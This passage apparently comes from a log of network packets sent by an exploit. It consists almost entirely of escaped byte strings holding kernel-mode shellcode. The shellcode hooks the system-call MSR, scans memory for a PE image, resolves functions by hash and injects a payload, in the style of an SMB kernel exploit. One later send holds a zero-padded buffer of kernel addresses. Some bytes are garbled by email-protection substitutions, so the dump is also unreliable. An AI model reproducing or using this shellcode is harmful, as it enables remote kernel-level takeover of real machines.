\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 19, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
